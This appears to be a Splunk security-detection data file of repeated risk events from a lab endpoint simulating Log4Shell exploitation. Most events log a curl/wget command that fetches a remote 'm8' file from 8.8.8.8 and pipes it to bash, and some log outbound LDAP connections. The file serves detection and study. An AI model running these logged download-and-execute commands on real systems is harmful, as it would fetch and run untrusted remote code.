annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 
Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639457, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", 
annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639457, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", 
annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget 
on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it 
with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was 
identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", 
process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", 
parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", 
count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
